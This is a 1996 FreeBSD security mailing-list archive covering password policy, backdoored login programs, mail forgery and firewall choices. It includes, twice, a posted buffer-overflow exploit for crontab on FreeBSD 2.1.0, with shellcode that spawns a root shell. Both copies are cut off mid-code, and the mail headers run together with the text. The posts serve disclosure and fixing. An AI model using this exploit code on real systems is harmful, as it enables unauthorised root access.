dfw.dfw.net (aleph1@dfw.dfw.net [198.175.15.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA12853; Sun, 15 Dec 1996 15:12:59 -0800 (PST) Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA29130; Sun, 15 Dec 96 17:10:51 CST Date: Sun, 15 Dec 1996 17:10:51 -0600 (CST) From: Aleph One To: Terry Lambert Cc: rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152221.PAA24138@phaeton.artisoft.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > Try five failed login attempts to telnet on a Sun machine. It delays > (and reports) each failed attempt, and drops the connection (after as > huge delay) after the fifth. Try su on a Solaris machine and if it takes to long hit ^C. The attempt will not be logged. You assume all such attems will be logged and trigger some alarm. You also assume the are trigger on all system that can verify a password. Thats a lot of assumtions. Its easier to cut bad passwords at the source. > Regards, > Terry Lambert > terry@lambert.org > --- > Any opinions in this posting are my own and not those of my present > or previous employers. > Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From owner-freebsd-security Sun Dec 15 15:30:54 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14643 for security-outgoing; Sun, 15 Dec 1996 15:30:54 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA14623; Sun, 15 Dec 1996 15:30:47 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id QAA00303; Sun, 15 Dec 1996 16:25:42 -0700 From: Terry Lambert Message-Id: <199612152325.QAA00303@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Sun, 15 Dec 1996 16:25:42 -0700 (MST) Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG In-Reply-To: from "Digital Dreamer" at Dec 15, 96 05:10:04 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > Just my opinion about anal passwd programs... > > The idea, from what I understand, is to act as if you don't have shadow > passwords, and therefore not rely on them. Security through obscurity > and all that. > > For example, let's say someone breaks root on your machine. Ok, you're > in a lot of trouble. But let's attempt to minimize the damage by not > giving them 6e12 accounts to log on as in the future when/if they're > discovered by handing over the passwords for them on a silver plate. It > takes a lot longer to get all your users to change passwords than it > takes to fix a backdoored /bin/login. A backdoored /bin/login can be nothing more than a program that mails account/password pairs. Be that as it may, by logical extension, we should act as if we didn't have passwords, and therefore not rely on them. Didn't know you were a radical Stallmanite... 8-) 8-). The reductio-ad-absurdum of this is wondering if someone has bribed the person who digs the rocks that are used to manufacture the nitric acid that is used for soaking the gun cotton at the ammunition plant that supplies the bullets to the Government you got your Marine guards from so their guns don't go off when the person who did the bribing comes to break in to the 10M drive on your PC-XT. You could also worry that someone would fake an accident so that while delivering the pick to the store where the guy who digs the rocks boss'es purchasing agent got his pick, they could substitute a different pick so that the rocks it was used on would fail to make good nitric acid. Not to mention the guy who planted the tree 120 years ago, which was milled into the handle for that pick... after all, this could be a wide-ranging conspiricy which has been in planning for centuries. ...like they wouldn't just send masked ninjas to get your disk. 8-P. Regards, Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Sun Dec 15 15:32:14 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14845 for security-outgoing; Sun, 15 Dec 1996 15:32:14 -0800 (PST) Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id PAA14840; Sun, 15 Dec 1996 15:32:11 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.8.4/8.8.4) id RAA11139; Sun, 15 Dec 1996 17:36:12 -0700 Date: Sun, 15 Dec 1996 17:36:12 -0700 (MST) From: Digital Dreamer To: Terry Lambert cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152325.QAA00303@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > > For example, let's say someone breaks root on your machine. Ok, you're > > in a lot of trouble. But let's attempt to minimize the damage by not > > giving them 6e12 accounts to log on as in the future when/if they're > > discovered by handing over the passwords for them on a silver plate. It > > takes a lot longer to get all your users to change passwords than it > > takes to fix a backdoored /bin/login. > > A backdoored /bin/login can be nothing more than a program that mails > account/password pairs. Really? In a lot of places, /bin/login is suid. It's a common trick to have a backdoored login that will let you in as any user if you supply the correct backdoor password, and even better, it neglects to put your login in utmp so a 'w' won't show you. > Be that as it may, by logical extension, we should act as if we didn't > have passwords, and therefore not rely on them. In fact, it seems to be that is a rather good idea for places where security is imperative. Secure your system from the inside as well, so if someone does break in to your machine, they can't get root. Secure it from the inside, even if you don't (think you have) any holes allowing those from the outside to get in. > from so their guns don't go off when the person who did the bribing > comes to break in to the 10M drive on your PC-XT. It's 2MB, and the ST-506 controller went last week. dreamer From owner-freebsd-security Sun Dec 15 15:44:56 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA16142 for security-outgoing; Sun, 15 Dec 1996 15:44:56 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA16115; Sun, 15 Dec 1996 15:44:51 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id QAA00213; Sun, 15 Dec 1996 16:36:04 -0700 From: Terry Lambert Message-Id: <199612152336.QAA00213@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Sun, 15 Dec 1996 16:36:04 -0700 (MST) Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG In-Reply-To: from "Digital Dreamer" at Dec 15, 96 05:36:12 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > from so their guns don't go off when the person who did the bribing > > comes to break in to the 10M drive on your PC-XT. > > It's 2MB, and the ST-506 controller went last week. Fool! Your machine is not safe... all ninjas worth their salt carry extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap? Regards, Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Sun Dec 15 16:18:46 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA20942 for security-outgoing; Sun, 15 Dec 1996 16:18:46 -0800 (PST) Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA20910; Sun, 15 Dec 1996 16:18:36 -0800 (PST) Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id AAA03019; Mon, 16 Dec 1996 00:04:03 GMT Date: Mon, 16 Dec 1996 00:03:01 GMT Received: from [194.32.164.2] by seagoon.gid.co.uk; Mon, 16 Dec 1996 00:03:01 GMT X-Sender: rb@194.32.164.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Terry Lambert From: rb@gid.co.uk (Bob Bishop) Subject: Re: vulnerability in new pw suite Cc: proff@iq.org, security@freebsd.org, hackers@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 1:39 pm 15/12/96, Terry Lambert wrote: >Heh. > >Please define "unsafe" in the context of a functional (inaccessible for >pre-salt-based attacks) shadow password system. > >8-) 8-). > >I'm tired of having passwd not let me use whatever password I want, >considering that with a shadow file, the user will have to brute-force >it through /bin/login or equivalent. It seems the harder it becomes to >see my post-encryption password, the more anal the passwd command >becomes about making post-encryption passwords "safe" from attacks >which are impossible to institute unless root has been compromised. Yeah, fine on an isolated machine, but those pesky users also insist on using the same weak password on lots of different systems. So if some sleaze does manage to get root on your system and thus access to your shadow file, five gets you ten the user passwords he can now derive will work on neighbouring systems. -- Bob Bishop (0118) 977 4017 international code +44 118 rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK From owner-freebsd-security Sun Dec 15 18:48:02 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA02428 for security-outgoing; Sun, 15 Dec 1996 18:48:02 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id SAA02409 for ; Sun, 15 Dec 1996 18:47:59 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA15439 (5.67b/IDA-1.5 for ) Mon, 16 Dec 1996 10:47:15 +0800 Received: by champion (4.1/S2.0-sunos4) id AA24199; Mon, 16 Dec 96 10:47:01 HKT Date: Mon, 16 Dec 1996 10:47:01 +0800 (HKT) From: Doug Kwan ~{9XUq5B~} To: Cy Schubert - ITSD Open Systems Group Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: <199612151550.HAA14407@passer.osg.gov.bc.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, On Sun, 15 Dec 1996, Cy Schubert - ITSD Open Systems Group wrote: > I've used the following to ban known advertisers to my desktop Alpha > at work. Someone had posted it on BUGTRAQ about six months ago and > unfurtunately I cannot remember his name. > Unfortunately, that jerk uses fake e-mail address. He sent mail in our support account's name. We cannot filter mails from our support account. Thanks -Doug From owner-freebsd-security Sun Dec 15 21:37:56 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA07961 for security-outgoing; Sun, 15 Dec 1996 21:37:56 -0800 (PST) Received: from molhub.mol.net.my (molhub.mol.net.my [202.190.128.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id VAA07955; Sun, 15 Dec 1996 21:37:50 -0800 (PST) Received: from pc-65kl1.mol.net.my by molhub.mol.net.my; Mon, 16 Dec 96 13:37:34 -0800 X-Sender: mfwong@mol.net.my X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: questions@freebsd.org From: Mun Fai WONG Subject: FreeBSD vs BorderWare Cc: security@freebsd.org Message-Id: <32b5c1243534002@molhub.mol.net.my> Date: Mon, 16 Dec 96 13:37:45 -0800 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, I am given the oppurtunity to propose a Internet gateway/server with security features in the form of firewall mechanism. The prospective customers seem to be more keen in BorderWare as the solution for the following reasons: 1) It is based on a secured OS phillosophy 2) It is "commercially" backed by the vendor 3) It has been tested 4) Availability of the source to the modified kernel is impossible compared to FreeBSD as FreeBSD is a very "open" software distribution with source codes freely available. 5) It does VPN, NAT and Secured Server Network (SSN, vs DMZ) So, I really like to get a frank opinion/experience/suggestions on how people rate FreeBSD 2.1 onwards against BorderWare etc in terms of security features. Personally, I have only read through BorderWare whitepaper and not the chance to actually put my hands on it, and I really appreciate any feedbacks. Thanks in advance. From owner-freebsd-security Sun Dec 15 21:40:45 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA08113 for security-outgoing; Sun, 15 Dec 1996 21:40:45 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id VAA08108; Sun, 15 Dec 1996 21:40:42 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZVj9-00049U-00; Sun, 15 Dec 1996 22:36:35 -0700 To: Terry Lambert Subject: Re: vulnerability in new pw suite Cc: dreamer@garrison.inetcan.net (Digital Dreamer), rb@gid.co.uk, proff@iq.org, security@freebsd.org, hackers@freebsd.org In-reply-to: Your message of "Sun, 15 Dec 1996 16:36:04 MST." <199612152336.QAA00213@phaeton.artisoft.com> References: <199612152336.QAA00213@phaeton.artisoft.com> Date: Sun, 15 Dec 1996 22:36:35 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199612152336.QAA00213@phaeton.artisoft.com> Terry Lambert writes: : Fool! Your machine is not safe... all ninjas worth their salt carry : extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap? And to Terry Lambert, I leave a boot to the head... :-) Warner "I learned Tai-Kwan Leap to kick some bootie" Losh From owner-freebsd-security Sun Dec 15 22:17:51 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id WAA09220 for security-outgoing; Sun, 15 Dec 1996 22:17:51 -0800 (PST) Received: from silver.sms.fi (root@silver.sms.fi [194.111.122.17]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id WAA09212 for ; Sun, 15 Dec 1996 22:17:48 -0800 (PST) Received: (from pete@localhost) by silver.sms.fi (8.7.6/8.7.3) id IAA03360; Mon, 16 Dec 1996 08:17:17 +0200 (EET) Date: Mon, 16 Dec 1996 08:17:17 +0200 (EET) Message-Id: <199612160617.IAA03360@silver.sms.fi> From: Petri Helenius To: Doug Kwan ~{9XUq5B~} Cc: Cy Schubert - ITSD Open Systems Group , security@freebsd.org Subject: Re: mail bomb! In-Reply-To: References: <199612151550.HAA14407@passer.osg.gov.bc.ca> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Doug Kwan ~{9XUq5B~} writes: > Hi, > > Unfortunately, that jerk uses fake e-mail address. He sent mail > in our support account's name. We cannot filter mails from our > support account. > Have you ever considered using PGP signatures to verify the authtenticity of your postings. If the neccessity of verifying the signature would be informed at signup time, it would be the 'user's fault' if he/she would believe the message without verifying it. Pete From owner-freebsd-security Mon Dec 16 00:07:06 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA12199 for security-outgoing; Mon, 16 Dec 1996 00:07:06 -0800 (PST) Received: from xkis.kis.ru (root@xkis.kis.ru [194.87.66.200]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA12194; Mon, 16 Dec 1996 00:06:59 -0800 (PST) Received: from localhost (dv@localhost) by xkis.kis.ru (8.8.3/8.8.3) with SMTP id LAA12081; Mon, 16 Dec 1996 11:05:20 +0300 (MSK) Date: Mon, 16 Dec 1996 11:05:19 +0300 (MSK) From: Dmitry Valdov To: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: crontab security hole Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello! Are there any fixes for crontab? I've exploit which allow any user to become root using crontab security hole. Dmitry. From owner-freebsd-security Mon Dec 16 00:46:31 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA13089 for security-outgoing; Mon, 16 Dec 1996 00:46:31 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id AAA13084 for ; Mon, 16 Dec 1996 00:46:26 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA01300 (5.67b/IDA-1.5 for ) Mon, 16 Dec 1996 16:45:21 +0800 Received: by champion (4.1/S2.0-sunos4) id AA01860; Mon, 16 Dec 96 16:45:04 HKT Date: Mon, 16 Dec 1996 16:45:03 +0800 (HKT) From: Doug Kwan ~{9XUq5B~} To: Petri Helenius Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: <199612160617.IAA03360@silver.sms.fi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello Pete, On Mon, 16 Dec 1996, Petri Helenius wrote: > Have you ever considered using PGP signatures to verify the > authtenticity of your postings. If the neccessity of verifying the > signature would be informed at signup time, it would be the 'user's > fault' if he/she would believe the message without verifying it. Most ISP's have customers who are not computer gurus. Asking them to use PGP to verify all our messages would not be a good idea. Anyway we would take your advice to digitally sign all our messages. Thanx -Doug From owner-freebsd-security Mon Dec 16 02:06:14 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA16129 for security-outgoing; Mon, 16 Dec 1996 02:06:14 -0800 (PST) Received: from xkis.kis.ru (root@xkis.kis.ru [194.87.66.200]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA16120 for ; Mon, 16 Dec 1996 02:06:06 -0800 (PST) Received: from localhost (dv@localhost) by xkis.kis.ru (8.8.3/8.8.3) with SMTP id NAA14434 for ; Mon, 16 Dec 1996 13:04:33 +0300 (MSK) Date: Mon, 16 Dec 1996 13:04:33 +0300 (MSK) From: Dmitry Valdov To: freebsd-security@freebsd.org Subject: crontab security hole exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello! Exploit for buffer overflow in crontab. /* ---------------------------- CUT HERE ----------------------------------- */ /* */ /* Hi ! */ /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ /* If you have any problems with it, drop me a letter. */ /* Have fun ! */ /* */ /* */ /* ---------------------- */ /* --------------------------------------------- */ /* ----------------- Dedicated to my beautiful lady ------------------ */ /* --------------------------------------------- */ /* ---------------------- */ /* */ /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ #include main() { #define length 353 int i,j; unsigned long start_addr; char *env[]={NULL}; char param_string[length]; char code_string[]= { "\xeb\x2a" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ "\xc3" /* ret */ /* 0xffffffe0(%ebp): */ "/bin/sh" /* 0xffffffe7(%ebp): */ "\x01" /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ "\xe8\xcb\xff\xff\xff" /* call geteip */ "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ "\x55" /* pushl %ebp */ "\xe8\xd4\xff\xff\xff" /* call execve */ }; for(i=0;i Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA17929 for security-outgoing; Mon, 16 Dec 1996 02:44:43 -0800 (PST) Received: from silver.sms.fi (root@silver.sms.fi [194.111.122.17]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA17916 for ; Mon, 16 Dec 1996 02:44:39 -0800 (PST) Received: (from pete@localhost) by silver.sms.fi (8.7.6/8.7.3) id MAA03828; Mon, 16 Dec 1996 12:44:20 +0200 (EET) Date: Mon, 16 Dec 1996 12:44:20 +0200 (EET) Message-Id: <199612161044.MAA03828@silver.sms.fi> From: Petri Helenius To: Doug Kwan ~{9XUq5B~} Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: References: <199612160617.IAA03360@silver.sms.fi> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Doug Kwan ~{9XUq5B~} writes: > Hello Pete, > > On Mon, 16 Dec 1996, Petri Helenius wrote: > > > Have you ever considered using PGP signatures to verify the > > authtenticity of your postings. If the neccessity of verifying the > > signature would be informed at signup time, it would be the 'user's > > fault' if he/she would believe the message without verifying it. > > Most ISP's have customers who are not computer gurus. Asking them > to use PGP to verify all our messages would not be a good idea. Anyway > we would take your advice to digitally sign all our messages. > My message could have been misunderstood that the misunderstanding should be blamed on the customers. However this was not my intention. The idea was to give proper ammunition to the customers that do care and know how to do the trick. Maybe as a side-effect more of the world would grow authtenticity-aware. Today, too many people believe what they read is authtentic without actually giving any thought to the possibility of a forgery. Pete From owner-freebsd-security Mon Dec 16 03:47:23 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id DAA20725 for security-outgoing; Mon, 16 Dec 1996 03:47:23 -0800 (PST) Received: from whale.gu.kiev.ua (whale.gu.net [194.93.190.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id DAA20710 for ; Mon, 16 Dec 1996 03:47:04 -0800 (PST) Received: from creator.gu.kiev.ua (stesin@creator.gu.kiev.ua [194.93.190.3]) by whale.gu.kiev.ua (8.7.5/8.7.3) with ESMTP id NAA56002 for ; Mon, 16 Dec 1996 13:46:58 +0200 X-Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by creator.gu.kiev.ua with ESMTP id BAA24287 for ; Sun, 15 Dec 1996 01:19:29 +0200 X-Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <33614-4514>; Sat, 14 Dec 1996 18:18:59 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id SAA26868; Sat, 14 Dec 1996 18:06:11 -0500 X-Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 1868880 for BUGTRAQ@NETSPACE.ORG; Sat, 14 Dec 1996 17:57:08 -0500 X-Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with SMTP id RAA26060 for ; Sat, 14 Dec 1996 17:56:27 -0500 Approved-By: ALEPH1@UNDERGROUND.ORG X-Received: from leshka.chuvashia.su (leshka.chuvashia.su [194.58.212.226]) by netspace.org (8.8.2/8.8.2) with ESMTP id RAA22400 for ; Sat, 14 Dec 1996 17:23:38 -0500 X-Received: (from leshka@localhost) by leshka.chuvashia.su (8.8.3/8.8.3) id BAA00961; Sun, 15 Dec 1996 01:24:02 +0300 (MSK) Approved-By: Leshka Zakharoff Message-ID: <199612142224.BAA00961@leshka.chuvashia.su> Date: Sun, 15 Dec 1996 01:24:02 +0300 Reply-To: Leshka Zakharoff From: Leshka Zakharoff Subject: Exploit for crontab bug (FreeBSD 2.1.0). X-To: best-of-security@suburbia.net To: Multiple recipients of list BUGTRAQ ReSent-Date: Mon, 16 Dec 1996 13:45:48 +0200 (EET) ReSent-From: Andrew Stesin ReSent-To: security@freebsd.org ReSent-Message-ID: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk /* ---------------------------- CUT HERE ----------------------------------- */ /* */ /* Hi ! */ /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ /* If you have any problems with it, drop me a letter. */ /* Have fun ! */ /* */ /* */ /* ---------------------- */ /* --------------------------------------------- */ /* ----------------- Dedicated to my beautiful lady ------------------ */ /* --------------------------------------------- */ /* ---------------------- */ /* */ /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ #include main() { #define length 353 int i,j; unsigned long start_addr; char *env[]={NULL}; char param_string[length]; char code_string[]= { "\xeb\x2a" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ "\xc3" /* ret */ /* 0xffffffe0(%ebp): */ "/bin/sh" /* 0xffffffe7(%ebp): */ "\x01" /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ "\xe8\xcb\xff\xff\xff" /* call geteip */ "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ "\x55" /* pushl %ebp */ "\xe8\xd4\xff\xff\xff" /* call execve */ }; for(i=0;i Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id EAA21482 for security-outgoing; Mon, 16 Dec 1996 04:03:10 -0800 (PST) Received: from shadows.aeon.net (bsdsec@shadows.aeon.net [194.100.41.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id EAA21477 for ; Mon, 16 Dec 1996 04:03:05 -0800 (PST) Received: (from bsdsec@localhost) by shadows.aeon.net (8.8.4/8.8.3) id OAA11649; Mon, 16 Dec 1996 14:01:55 +0200 (EET) From: mika ruohotie Message-Id: <199612161201.OAA11649@shadows.aeon.net> Subject: Re: mail bomb! To: ctkwan@cs.hku.hk (Doug Kwan ~{9XUq5B~}) Date: Mon, 16 Dec 1996 14:01:55 +0200 (EET) Cc: cschuber@uumail.gov.bc.ca, security@freebsd.org In-Reply-To: from Doug Kwan ~{9XUq5B~} at "Dec 16, 96 10:47:01 am" X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > On Sun, 15 Dec 1996, Cy Schubert - ITSD Open Systems Group wrote: > Unfortunately, that jerk uses fake e-mail address. He sent mail > in our support account's name. We cannot filter mails from our > support account. you are using sendmail, right? you should atleast have this in your /etc/sendmail.cf O PrivacyOptions=authwarnings,needmailhelo,needexpnhelo,novrfy and then run it with loglevel 12, that should atleast help you from tracking down from where he's connecting, assuming you have no clue. but still, the administrative messages should _always_ be authenticated. > -Doug mickey -- mika ruohotie mika@aeon.net From owner-freebsd-security Mon Dec 16 05:03:18 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA26682 for security-outgoing; Mon, 16 Dec 1996 05:03:18 -0800 (PST) Received: from relay1.sw.ru (myth.sw.ru [194.190.197.129]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA26671 for ; Mon, 16 Dec 1996 05:02:57 -0800 (PST) Received: from zeus by relay1.sw.ru (8.8.4/8.8.4/jt) with SMTP id QAA00691 for ; Mon, 16 Dec 1996 16:01:59 +0300 (MSK) Message-Id: <3.0.32.19961216161045.00905ed0@myth.sw.ru> X-Url: http://www.sw.ru/~jt X-Sender: jt@myth.sw.ru X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 16 Dec 1996 16:10:46 +0300 To: security@freebsd.org From: Juri Tsibrovski Subject: Re: mail bomb! Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 21:43 15.12.96 +0100, Ollivier Robert wrote: >According to Cy Schubert - ITSD Open Systems Group: >> I've used the following to ban known advertisers to my desktop Alpha >> at work. Someone had posted it on BUGTRAQ about six months ago and >> unfurtunately I cannot remember his name. > >8.8.4 has also the check_compat rules to filter mails. It doesn't appear to >be really documented... There is a good page explaining these anti-spam features in sendmail 8.8: http://www.informatik.uni-kiel.de/%7Eca/email/check.html --- jt -- just typist :) From owner-freebsd-security Mon Dec 16 05:27:50 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA29035 for security-outgoing; Mon, 16 Dec 1996 05:27:50 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA29028 for ; Mon, 16 Dec 1996 05:27:48 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id HAA23928; Mon, 16 Dec 1996 07:27:56 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: <32b5c1243534002@molhub.mol.net.my> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 07:17:20 -0600 To: Mun Fai WONG From: Richard Wackerbarth Subject: Re: FreeBSD vs BorderWare Cc: security@freebsd.org 